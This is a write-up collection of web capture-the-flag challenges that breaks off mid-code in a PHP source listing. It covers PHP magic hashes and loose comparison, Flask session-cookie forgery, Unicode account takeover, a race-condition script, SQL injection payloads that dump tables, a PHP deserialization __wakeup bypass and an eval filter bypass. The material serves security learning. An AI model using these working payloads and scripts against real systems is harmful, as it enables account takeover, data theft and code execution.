hello14377472903:0e392752400759036121301780363977 hello14542031811:0e993811297795641783927086214820 hello14549026960:0e228469762885608934453271169645 hello14695240931:0e809229513191992773750209262421 hello14711786334:0e015890930978824184417033457171 hello14813130399:0e918361104734546542049362421574 hello14916008992:0e466819090700704408768809355877 hello14943865304:0e488468752018350982728547761723 hello14998876620:0e703717133545667739210903323083 hello15041922164:0e049115676628046268387027519760 hello15108682064:0e748863568511001009100615283009 hello15253019448:0e316384599798704817278060496674 hello15396444514:0e118295099101694190498400868465 hello15474675991:0e922451586661705450371971984450 hello16082441020:00e95246441910436569610504494429 hello16220342703:0e704187673611855154964811990062 hello16339255101:00e58378298714355054522900730468 hello17023991779:0e698031537843159768162020780735 hello18656227376:0e685754512634902310450933716189 hello18783191515:0e732403697443088745177978608703 hello19088586243:0e911992123744915158360782778515 hello19168039924:0e642276872339101894040672638043 hello19195083900:0e674601908431368289110857474953 hello19793116672:0e811903033662824759764930345353 hello20713211437:0e977690635887290867676681639188 hello21259679978:0e547772458960324697116900050578 hello21333925385:0e670417101053731652248174312214 hello21576290701:0e088186168631173581624876059389 hello21625635498:0e803278139459070019409565297938 hello21960910191:0e494496613662122765707618390572 hello22131016813:00e89083858553525267218694193703 hello22355149941:00e66954822291536238327643342602 hello22407846698:0e688065097905052131160818049682 hello22462419833:0e150021313229535479448960192497 hello22524840741:0e427165560473709541262115879322 hello22684541754:0e212089178649039431933729688866 hello23311692247:0e875225739151635763781768168050 hello23482483937:0e151847567205329626226186994212 hello23919947361:0e554834940334311467473897130531 hello24034989169:0e220987314997743625442964283314 
hello24343860700:0e070680132080871095604490841909 hello25957571388:0e505306610086634417027764698286 hello26790263335:0e781189643377847208451601226827 hello26903464651:0e914022345307317030885198241992 kFuiNituEBtYTL7s:00e98964689272988335938577613800 kZCLJqaExeldVpj0:0e656721453248642852483628066363 leEyBd5B7q3amjyG:0e394953505745405474013722050568 pumLyoapZAA9UDNG:00e97704981801156036802648235478 x3nHz0Tb1fId6UkI:0e389404952944040555093072566533 xqtlmRSdIANTlm1H:0e744254988746519482021441207857 zLnCfDklbnUmxqPX:0e584534642350465243534981705206 HFS_8z1+MWlaHRAH:00e75643634650030148510424537209 HFS_1+iq1ID4UnnU:0e735266984036051110930327520427 HFS_4HfzrCkFGXpw:0e646281365937497392704373659016 HFS_b+l93ZTnenaK:0e361812035730460151531645473846 HFS_StAqHq+DGI8d:0e111862011654913151517331666493 HFS_AxFzm23nYzeD:0e613355377549634251553032324836 HFS_0cIiLSiSswkh:00e66018400048726119673849053795 HFS_E0m8zzZKFT2R:00e13091337053035690315301170677 HFS_iWViAQ5MOc5g:00e26430923330343164204018649849 HFS_S73mdmL3numx:0e588371083636394650517986368324 HFS_9/rKCeq8tcY9:0e632684922796334502827808200584 .V;m=*]b?-:00e45653718969294213009554265803 egNJHP66&3E1:00e99757454497342716194968339146 KnCM6ogsNA1W:00e73414578113850089230341919829 &rh1ls6cl&G4:00e48890746054592674909531744787 0e215962017:0e291242476940776845150308577824
Summary of the collected strings (every one of them hashes to a value of the form 0e followed only by digits, which PHP's == treats as the number 0)
Step 3: bypassing strict comparison
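The list above is produced by brute force: hash prefix+counter until the hex digest matches 0e plus digits, which PHP reads as a numeric string equal to 0 * 10^N. The script below is an added example, not code from the page; it gives a `search()` helper that takes any predicate (so the slow magic-hash search and a fast sanity check share one loop), a model of PHP's string-vs-string loose comparison, and two classic magic-hash inputs (240610708 and QNKCDZO). The expected number of tries (roughly 3e8) is an estimate from the hex-digit probabilities, not a figure from the page.

```python
import hashlib
import re

# A "magic hash": 0e (possibly with extra leading zeros) followed only by
# digits. PHP parses it as a numeric string, 0 * 10^N == 0.
MAGIC_RE = re.compile(r"^0+e[0-9]+$")
# PHP numeric-string grammar (leading whitespace, sign, digits, optional exponent).
PHP_NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(hexdigest: str) -> bool:
    """True if PHP's == would treat this digest as the number 0."""
    return MAGIC_RE.match(hexdigest) is not None


def php_loose_string_eq(a: str, b: str) -> bool:
    """Model of PHP `==` between two strings: if both are numeric strings they
    compare as numbers, otherwise byte-for-byte (PHP 5/7/8 agree here)."""
    if PHP_NUMERIC_RE.match(a) and PHP_NUMERIC_RE.match(b):
        return float(a) == float(b)
    return a == b


def search(prefix: str, predicate, max_tries: int):
    """Hash prefix+counter until predicate(hexdigest) is true.
    Deterministic (counter starts at 0); returns (candidate, digest) or None."""
    for i in range(max_tries):
        cand = f"{prefix}{i}"
        digest = md5_hex(cand)
        if predicate(digest):
            return cand, digest
    return None


def find_magic_hash(prefix: str, max_tries: int = 1_000_000_000):
    """Magic-hash search. Two fixed hex chars (1/256) and 30 digit-only
    positions ((10/16)^30) put the expected cost near 3e8 tries."""
    return search(prefix, is_magic_hash, max_tries)


if __name__ == "__main__":
    for s in ("QNKCDZO", "240610708"):
        print(s, md5_hex(s), is_magic_hash(md5_hex(s)))
    print(php_loose_string_eq(md5_hex("QNKCDZO"), md5_hex("240610708")))
    # Cheap demo of the loop: digests starting with "00" show up every ~256 tries.
    print(search("hello", lambda h: h.startswith("00"), 100_000))
```

Run `find_magic_hash("hello")` in a loop over several processes if you want fresh entries for the list; the predicate is the only thing that changes between the demo and the real search.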
levell14.php
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if ($_POST['param1'] !== $_POST['param2'] && md5($_POST['param1']) === md5($_POST['param2'])) {
    echo $flag;
}
Array bypass: md5() called on an array does not return a string; it emits a warning and returns NULL (PHP < 8; PHP 8 throws a TypeError instead). So param1[]=1&param2[]=2 gives two arrays that are !== to each other while both "hashes" are NULL === NULL.
MD5碰撞 Are there two known strings which have the same MD5 hash value?
Collisions for Hash Functions MD4, MD5, HAVAL-128 and RIPEMD
I won't try this part; anyone interested can dig into it further.
[HCTF 2018]admin hint: the index page and the change page contain comments
<!-- you are not admin --> <!-- https://github.com/woadsl1234/hctf_flask/ -->
Intended solution: Unicode homoglyphs. Reference: the historical Spotify vulnerability, Creative usernames and Spotify account hijacking https://engineering.atspotify.com/2013/06/18/creative-usernames/
The strlower method converts uppercase letters to lowercase. Note: superscript and subscript letters are converted to the corresponding homoglyph (their plain base letter).
In routes.py, both the login page /login and the password-change page /change call strlower.
When a Unicode character is normalised it is mapped to its corresponding homoglyph.
Exploit with the homoglyph ᴬdmin: strlower runs once at registration, and runs again when the password is changed on /change.
ᴬ -> A -> a
The registered name Admin is distinct from admin, but the second pass turns it into admin, so /change resets admin's password and you can log in as admin.
上下标字母查询表-Superscript and Subscript Letters
str.lower
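The two-pass behaviour above is easy to reproduce with the standard library. The code below is an added example, not the challenge's routes.py: `strlower()` models the effect the page describes (case mapping first, then NFKC normalisation, which is the stringprep order; the modifier letter U+1D2C has no lowercase form, so the first pass only normalises it to "A"), and `canonical_username()` is the defensive variant that iterates to a fixed point so registration compares the same value every later request will see. The in-memory `db` dicts are constructed sample data.

```python
import unicodedata


def strlower(username: str) -> str:
    """Model of the challenge's strlower as the page describes it:
    case-map, then NFKC-normalise. One pass: 'ᴬdmin' -> 'Admin'."""
    return unicodedata.normalize("NFKC", username.lower())


def canonical_username(username: str, max_rounds: int = 8) -> str:
    """Defensive variant: re-apply strlower until the value stops changing,
    so 'ᴬdmin' canonicalises straight to 'admin'."""
    for _ in range(max_rounds):
        nxt = strlower(username)
        if nxt == username:
            return username
        username = nxt
    raise ValueError("username did not converge")


def register(db: dict, username: str, password: str) -> bool:
    """Vulnerable /register: one strlower pass, then a uniqueness check."""
    name = strlower(username)
    if name in db:
        return False
    db[name] = password
    return True


def change_password(db: dict, session_username: str, new_password: str) -> str:
    """Vulnerable /change: strlower runs again on the name kept in the session,
    so a session for 'Admin' writes the password of 'admin'."""
    name = strlower(session_username)
    db[name] = new_password
    return name


def register_fixed(db: dict, username: str, password: str) -> bool:
    """Hardened registration: compare the fixed-point form."""
    name = canonical_username(username)
    if name in db:
        return False
    db[name] = password
    return True


if __name__ == "__main__":
    db = {"admin": "secret"}              # constructed sample data
    print(register(db, "\u1d2cdmin", "x"))    # True: stored as 'Admin'
    print(change_password(db, "Admin", "pwned"), db["admin"])
    print(register_fixed({"admin": "secret"}, "\u1d2cdmin", "x"))  # False
```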
Unintended solution: Flask session forgery. Code to decode the session:
Source: PHITHON
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    # cookie layout: payload.timestamp.signature
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    # a leading '.' marks a zlib-compressed payload
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))
flask-session-cookie-manager
SECRET_KEY=ckj123 is found in config.py
I tried several times and still couldn't get it to work, annoying.
Normal case
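With the secret key known, the cookie can be signed by hand. The code below is an added example (not the page's script and not PHITHON's): it re-implements, with the standard library only, the scheme Flask's SecureCookieSessionInterface uses through itsdangerous' URLSafeTimedSerializer (salt "cookie-session", HMAC-SHA1 key derivation, signature over payload.timestamp, optional zlib compression marked by a leading "."), so it runs without Flask installed and `forge_session()` output has the exact layout `decryption()` above expects. The session contents (`name`, `user_id`) are an assumption for illustration, not keys taken from the challenge source; Flask only checks the HMAC and then JSON-decodes, so any keys the application reads can be set this way.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's fixed salt for session cookies


def b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def derive_key(secret_key: str) -> bytes:
    # itsdangerous key_derivation="hmac": HMAC(secret, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def forge_session(secret_key: str, session: dict, timestamp: Optional[int] = None) -> str:
    """Produce payload.timestamp.signature exactly as Flask would."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:       # itsdangerous' compression rule
        payload = b"." + b64e(compressed)
    else:
        payload = b64e(raw)
    ts = timestamp if timestamp is not None else int(time.time())
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    signed = payload + b"." + b64e(ts_bytes)
    sig = hmac.new(derive_key(secret_key), signed, hashlib.sha1).digest()
    return (signed + b"." + b64e(sig)).decode()


def verify_session(secret_key: str, cookie: str, max_age: Optional[int] = None):
    """Return the session dict if signature (and age) check out, else None."""
    try:
        signed, sig = cookie.encode().rsplit(b".", 1)
        expected = hmac.new(derive_key(secret_key), signed, hashlib.sha1).digest()
        if not hmac.compare_digest(b64d(sig), expected):
            return None
        payload, ts = signed.rsplit(b".", 1)
        if max_age is not None:
            issued = int.from_bytes(b64d(ts), "big")
            if time.time() - issued > max_age:
                return None
        raw = zlib.decompress(b64d(payload[1:])) if payload.startswith(b".") else b64d(payload)
        return json.loads(raw)
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    # SECRET_KEY from config.py; session keys are an assumption for the demo
    cookie = forge_session("ckj123", {"name": "admin", "user_id": 1})
    print(cookie)
    print(verify_session("ckj123", cookie))
```

Send the printed value as the `session` cookie; `verify_session()` doubles as a check that a cookie captured from the real application was signed with the key you think it was.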
Race condition
import requests
import threading

BASE = "http://abb82588-6b5e-444e-8c58-c86ee65d552b.node4.buuoj.cn:81"


def login(s, username, password):
    data = {'username': username, 'password': password, 'submit': ''}
    return s.post(BASE + "/login", data=data)


def logout(s):
    return s.get(BASE + "/logout")


def change(s, newpassword):
    data = {'newpassword': newpassword}
    return s.post(BASE + "/change", data=data)


def func1(s):
    # thread 1: log in as a normal user and change the password
    login(s, 'master', 'master')
    change(s, 'ba2in9a')


def func2(s):
    # thread 2: log out and try to log in as admin with the new password
    logout(s)
    res = login(s, 'admin', 'ba2in9a')
    if '<a href="/index">/index</a>' in res.text:
        print('finish')


def main():
    for i in range(9999):
        print(i)
        s = requests.Session()
        t1 = threading.Thread(target=func1, args=(s,))
        t2 = threading.Thread(target=func2, args=(s,))
        t1.start()
        t2.start()


if __name__ == "__main__":
    main()
Didn't get the expected result, gave up.
Challenge author ckj123's write-up
Sky's first-blood write-up
graneed's write-up
[极客大挑战 2019]BuyFlag /pay.php
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number</br>";
    }elseif ($password == 404) {
        echo "Password Right!</br>";
    }
}
-->
cookie: You must be a student from CUIT!!! Only Cuit's students can buy the FLAG
Change Cookie: user=0 to user=1
you are Cuiter
Loose comparison: is_numeric() runs first, then password == 404. A non-numeric string with the numeric prefix 404 passes both (PHP 5/7 cast the string to its leading number; in PHP 8 an int is compared with a non-numeric string as strings, so this no longer works).
PHP loose-comparison bypass
password=404flag
Password Right! Pay for the flag!!!hacker!!!
Scientific notation or an array. Response: Flag need your 100000000 money
money=1000000000
Nember lenth is too long
money=99999999
i.e. when money is less than 100000000:
you have not enough money,loser~
money=1e9 / money[]=1 (is_numeric() accepts exponent notation, so 1e9 is only three characters long; for an array, strlen() returns NULL and an array always compares greater than an integer)
[护网杯 2018]easy_tornado
hint:
/flag.txt  /file?filename=/flag.txt&filehash=e772097775f523d08a70818acbcfa39e  flag in /fllllllllllllag
filename=/fllllllllllllag
/welcome.txt  /file?filename=/welcome.txt&filehash=df5cb6a70865f967cc4f829f0bfdb80f
render
SSTI
Tornado, a lightweight Python web framework, calls render to build the page from a template; the error page renders the msg parameter as a template, which is the SSTI entry point.
/file?filename=/hints.txt&filehash=4954f0b53a5bcfe596332cc9f4a3c8e7
/hints.txt: md5(cookie_secret+md5(filename))
This states how filehash is generated.
The key is obtaining cookie_secret.
cookie_secret is a key in handler.application.settings.
handler -> RequestHandler
RequestHandler.settings -> self.application.settings
handler.settings -> handler.application.settings
So cookie_secret is reachable directly through handler.settings.
/error?msg={{handler.settings}} {'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'cba73db5-9b2f-4f78-a0c1-577900cda7d6'}
Generate filehash with md5(cookie_secret + md5('/fllllllllllllag'))
Server-side template injection (SSTI) topic
An article to understand SSTI vulnerabilities
Authentication and security
RequestHandler.settings
Template syntax - handler
[ACTF2020 新生赛]BackupFile: directory scan
/index.php.bak
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
} else {
    echo "Try to find out source file!";
}
?>
PHP loose comparison: intval("123") is the integer 123, and in PHP 5/7 an integer compared with a non-numeric string casts the string to its leading number (123), so 123 == "123ffw..." holds. PHP 8 compares the two as strings instead, where it fails.
Payload ?key=123
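BuyFlag (404 == "404flag", the money length check, 1e9) and BackupFile (intval($key) == $str) both rest on how PHP compares an integer with a string. The code below is an added example, not from the page: it models PHP's numeric-string grammar, the PHP 5/7 cast-to-leading-number rule and the PHP 8 rule (numeric strings compare as numbers, anything else as strings), and then replays the two challenges' checks under both. The money length limit of 9 characters is an assumption inferred from the observed responses (10 characters rejected, 8 accepted); the page does not show that code. The array variants (money[]=1, param[]) are not modelled.

```python
import re

# PHP numeric string: optional leading whitespace, sign, integer/decimal
# digits, optional exponent. PHP 8 also tolerates trailing whitespace.
_NUM = r"[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?"
NUMERIC_RE = re.compile(r"^\s*" + _NUM + r"$")
NUMERIC_RE_PHP8 = re.compile(r"^\s*" + _NUM + r"\s*$")
LEADING_RE = re.compile(r"^\s*(" + _NUM + ")")


def php_is_numeric(s: str, php8: bool = False) -> bool:
    return (NUMERIC_RE_PHP8 if php8 else NUMERIC_RE).match(s) is not None


def php_leading_number(s: str) -> float:
    """PHP 5/7 string-to-number cast: numeric prefix, or 0 if there is none."""
    m = LEADING_RE.match(s)
    return float(m.group(1)) if m else 0.0


def php_int_eq_string(n: int, s: str, php8: bool = False) -> bool:
    """Model of `int == string`.
    PHP 5/7: the string is cast to a number (prefix or 0) and compared.
    PHP 8:   numeric strings still compare numerically; a non-numeric string
             is compared with the int converted to a string."""
    if php8:
        if php_is_numeric(s, php8=True):
            return float(n) == float(s)
        return str(n) == s
    return float(n) == php_leading_number(s)


def buyflag_password_ok(password: str, php8: bool = False) -> bool:
    """pay.php: is_numeric($password) rejects, then $password == 404 accepts."""
    if php_is_numeric(password, php8):
        return False
    return php_int_eq_string(404, password, php8)


def buyflag_money_ok(money: str, max_len: int = 9) -> bool:
    """Money check as observed on the page; max_len=9 is an assumption."""
    if len(money) > max_len:
        return False          #  "Nember lenth is too long"
    return php_leading_number(money) >= 100000000


def backupfile_key_ok(key: str, php8: bool = False) -> bool:
    """index.php.bak: is_numeric($key), then intval($key) == $str."""
    target = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3"
    if not php_is_numeric(key, php8):
        return False
    return php_int_eq_string(int(php_leading_number(key)), target, php8)


if __name__ == "__main__":
    for php8 in (False, True):
        print("php8" if php8 else "php7",
              buyflag_password_ok("404flag", php8),
              backupfile_key_ok("123", php8))
    print(buyflag_money_ok("1e9"), buyflag_money_ok("1000000000"), buyflag_money_ok("99999999"))
```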
[极客大挑战 2019]BabySQL ?username=admin&password=-1' or 1=1 #
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘1=1 #’’ at line 1
The relevant keywords (or, union, select, from, where) are deleted by the filter, but only once and without rescanning the result, so writing each keyword inside itself (uniunionon -> union) bypasses it.
?username=admin&password=-1' oorr 1=1 #
Hello admin! Your password is ‘b57c0551628355fa5a8a3e247f810f7e’
?username=admin&password=-1' uniunionon selselectect 1,2,3 #
Hello 2! Your password is ‘3’
?username=admin&password=-1' uniunionon selselectect 1,version(),database() #
Hello 10.3.18-MariaDB! Your password is ‘geek’
?username=admin&password=-1' uniunionon selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #
Hello b4bsql,geekuser!
?username=admin&password=-1' uniunionon selselectect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #
Hello id,username,password!
?username=admin&password=-1' uniunionon selselectect 1,group_concat(id,username,passwoorrd),3 frfromom b4bsql #
Hello 1cl4yi_want_to_play_2077,2sqlsql_injection_is_so_fun,3porndo_you_know_pornhub,4gitgithub_is_different_from_pornhub,5Stopyou_found_flag_so_stop,6badguyi_told_you_to_stop,7hackerhack_by_cl4y,8flagflag{792d2355-89eb-4b4e-b89a-96437b387278}!
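The double-write trick works because the filter deletes each keyword in a single non-recursive pass. The code below is an added example, not the challenge's source: `strip_once()` models that filter, `double_write()` generates the bypass form for any query, and an in-memory SQLite database (constructed sample data; the table and column names follow the output above, the flag value is a placeholder) shows the string-built query being exploited while the parameterised version is not. SQLite uses `--` for comments where the page's MariaDB payloads use `#`.

```python
import re
import sqlite3

# Keywords the challenge strips, inferred from which words had to be doubled.
KEYWORDS = ["union", "select", "from", "where", "or"]


def strip_once(s: str) -> str:
    """Model of the vulnerable filter: one case-insensitive deletion pass per
    keyword, never rescanning the joined-up result."""
    for kw in KEYWORDS:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s


def double_write(payload: str) -> str:
    """Rewrite every keyword as prefix+keyword+suffix (union -> uniunionon)
    so that strip_once() reassembles the original word."""
    for kw in KEYWORDS:
        half = (len(kw) + 1) // 2
        payload = re.sub(kw, lambda m: m.group(0)[:half] + m.group(0) + m.group(0)[half:],
                         payload, flags=re.IGNORECASE)
    return payload


def make_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the challenge's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE geekuser(id INTEGER, username TEXT, password TEXT);
        CREATE TABLE b4bsql(id INTEGER, username TEXT, password TEXT);
        INSERT INTO geekuser VALUES (1, 'admin', 'b57c0551628355fa5a8a3e247f810f7e');
        INSERT INTO b4bsql VALUES (8, 'flag', 'flag{constructed-sample}');
    """)
    return conn


def vulnerable_login(conn, username: str, password: str):
    """Filter, then string-build the query, the way the challenge does."""
    u, p = strip_once(username), strip_once(password)
    sql = f"SELECT username, password FROM geekuser WHERE username='{u}' AND password='{p}'"
    return conn.execute(sql).fetchall()


def safe_login(conn, username: str, password: str):
    """Parameterised query: the payload is data, never SQL."""
    sql = "SELECT username, password FROM geekuser WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    dump = double_write("-1' union select group_concat(username||':'||password),'' from b4bsql -- ")
    print(dump)                       # what is sent
    print(strip_once(dump))           # what reaches the database
    conn = make_db()
    print(vulnerable_login(conn, "admin", dump))
    print(safe_login(conn, "admin", dump))
```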
[极客大挑战 2019]PHP: a directory scan finds www.zip
which contains the source
/index.php
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
PHP deserialization
/class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
unserialize() checks whether the class defines __wakeup; if it does, __wakeup is called first to set up the resources the object needs.
Here __wakeup has to be bypassed, because it overwrites username with 'guest' before __destruct runs.
When the property count in the serialized string is larger than the real number of properties, __wakeup is skipped (CVE-2016-7124; fixed in PHP 5.6.25 and 7.0.10, so the target must run an older PHP).
The __wakeup() vulnerability and analysis of real cases
Exploit:
<?php
class Name {
    private $username = 'admin';
    private $password = '100';
}
$a = new Name();
echo serialize($a);
?>
Serialized output (private property names are stored as \0Name\0username; the two NUL bytes are invisible in the browser, which is why the declared length is 14 rather than 12):
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
Payload (property count raised from 2 to 3, NUL bytes written as %00):
?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
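Generating the payload without a PHP interpreter, and getting the NUL bytes and the inflated count right, is the part that usually goes wrong. The code below is an added example, not from the page: it serializes an object the way PHP does (private names mangled as \0Class\0name, protected as \0*\0name, lengths counted in bytes), takes an `extra_count` to trigger the __wakeup bypass, and URL-encodes the result. The test checks that it reproduces the page's payload byte for byte.

```python
from urllib.parse import quote


def php_serialize_value(v) -> str:
    """Strings and integers are all this exploit needs."""
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    raw = v.encode()
    return f's:{len(raw)}:"{v}";'          # length is in bytes, incl. NULs


def php_serialize_object(class_name: str, props: dict,
                         visibility: str = "private", extra_count: int = 0) -> str:
    """Serialize an object as PHP's serialize() would. extra_count inflates the
    declared property count to skip __wakeup (CVE-2016-7124, PHP < 5.6.25 /
    7.0.10); unserialize() still reads the properties that are present."""
    parts = []
    for name, value in props.items():
        if visibility == "private":
            key = f"\x00{class_name}\x00{name}"
        elif visibility == "protected":
            key = f"\x00*\x00{name}"
        else:
            key = name
        parts.append(php_serialize_value(key) + php_serialize_value(value))
    count = len(props) + extra_count
    body = "".join(parts)
    return f'O:{len(class_name)}:"{class_name}":{count}:{{{body}}}'


def url_payload(serialized: str) -> str:
    """Percent-encode everything (NUL -> %00, : -> %3A, ...) for the GET parameter."""
    return quote(serialized, safe="")


if __name__ == "__main__":
    obj = php_serialize_object("Name", {"username": "admin", "password": "100"}, extra_count=1)
    print(repr(obj))
    print("?select=" + url_payload(obj))
```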
[RoarCTF 2019]Easy Calc /index.html
$('#calc').submit(function(){
    $.ajax({
        url:"calc.php?num="+encodeURIComponent($("#content").val()),
        type:'GET',
        success:function(data){
            $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
        },
        error:function(){
            alert("这啥?算不来!");
        }
    })
    return false;
})
/calc.php
<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $str)) {
            die("what are you want to do?");
        }
    }
    eval('echo '.$str.';');
}
?>
calc.php?%20num=phpinfo()
PHP query-string parsing bypass (reference: Abusing PHP query string parser to bypass IDS, IPS, and WAF). PHP drops leading spaces from a parameter name and turns spaces and dots into underscores, so `%20num` still arrives as $_GET['num'] while a front-end filter matching on the literal parameter name `num` does not fire. Quotes are blacklisted, so strings are built with chr():
calc.php?%20num=var_dump(scandir(chr(47)))
calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
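Both halves of this bypass (the parameter-name normalisation and the quote-free string construction) can be checked offline. The code below is an added example, not the challenge's: `php_query_key()` models how PHP normalises a GET parameter name, `blocked()` replays the blacklist, `to_chr_concat()` builds the chr() chain, and `build_url()` assembles the request. One caveat worth knowing is left as a comment: the PHP entry `'\\'` is a single backslash, so its pattern becomes `/\/m`, an unterminated regex for which preg_match() returns false, meaning a literal backslash is not actually blocked by the original code; the model here blocks it as the author intended.

```python
import re
from urllib.parse import quote

# The PHP blacklist with PHP's single-quote escaping already resolved.
BLACKLIST = [" ", r"\t", r"\r", r"\n", "'", '"', "`", r"\[", r"\]", r"\$", r"\\", r"\^"]


def blocked(num: str) -> bool:
    """Model of the foreach/preg_match loop. (In the original, the '\\'
    pattern is malformed and never matches; modelled as intended here.)"""
    return any(re.search(item, num) for item in BLACKLIST)


def to_chr_concat(s: str) -> str:
    """Rewrite a string as chr(n).chr(n)... so it contains no quotes."""
    return ".".join(f"chr({ord(c)})" for c in s)


def php_query_key(raw_key: str) -> str:
    """PHP's register_variable normalisation of a GET parameter name:
    leading spaces are dropped, remaining spaces and dots become '_'.
    ('[' handling for arrays is not modelled.)"""
    return re.sub(r"[ .]", "_", raw_key.lstrip(" "))


def build_url(expr: str, base: str = "calc.php") -> str:
    """Request with the parameter name prefixed by an encoded space."""
    if blocked(expr):
        raise ValueError("expression hits the blacklist")
    return f"{base}?%20num={quote(expr, safe='')}"


if __name__ == "__main__":
    path = "/f1agg"                      # constructed example path
    expr = f"var_dump(file_get_contents({to_chr_concat(path)}))"
    print(expr)
    print(build_url(expr))
    print(php_query_key(" num"), php_query_key("a.b c"))
```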
[极客大挑战 2019]LoveSQL ?username=admin&password=-1%27+or+1%3D1+%23
hint Your password is ‘50753b5b26e65cbcdfab97b0e4569841’
Don't bother cracking the MD5; keep probing the injection.
Try union injection. Determine the column count: ?username=admin&password=-1' order by 1,2,3,4 #
Unknown column ‘4’ in ‘order clause’
So there are three columns.
?username=admin&password=-1' union select 1,2,3 #
Query basic database information: ?username=admin&password=-1' union select 1,@@version_compile_os,version() #
?username=admin&password=-1' union select 1,user(),database() #
Linux,10.3.18-MariaDB,root@localhost,geek
List tables: ?username=admin&password=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek' #
Hello geekuser,l0ve1ysq1!
List columns: ?username=admin&password=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1' #
Hello id,username,password!
Dump the data: ?username=admin&password=-1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1 #
Hello 1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{b1305613-af15-4561-b1c0-8ba3f2d4b04f}!
[强网杯 2019]随便注 source:
<?php
function waf1($inject) {
    preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);');
}
function waf2($inject) {
    strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")');
}
if(isset($_GET['inject'])) {
    $id = $_GET['inject'];
    waf1($id);
    waf2($id);
    $mysqli = new mysqli("127.0.0.1","root","root","supersqli");
    $sql = "select * from `words` where id = '$id';";
    $res = $mysqli->multi_query($sql);
    if ($res){
        do{
            if ($rs = $mysqli->store_result()){
                while ($row = $rs->fetch_row()){
                    var_dump($row);
                    echo "<br>";
                }
                $rs->Close();
                if ($mysqli->more_results()){
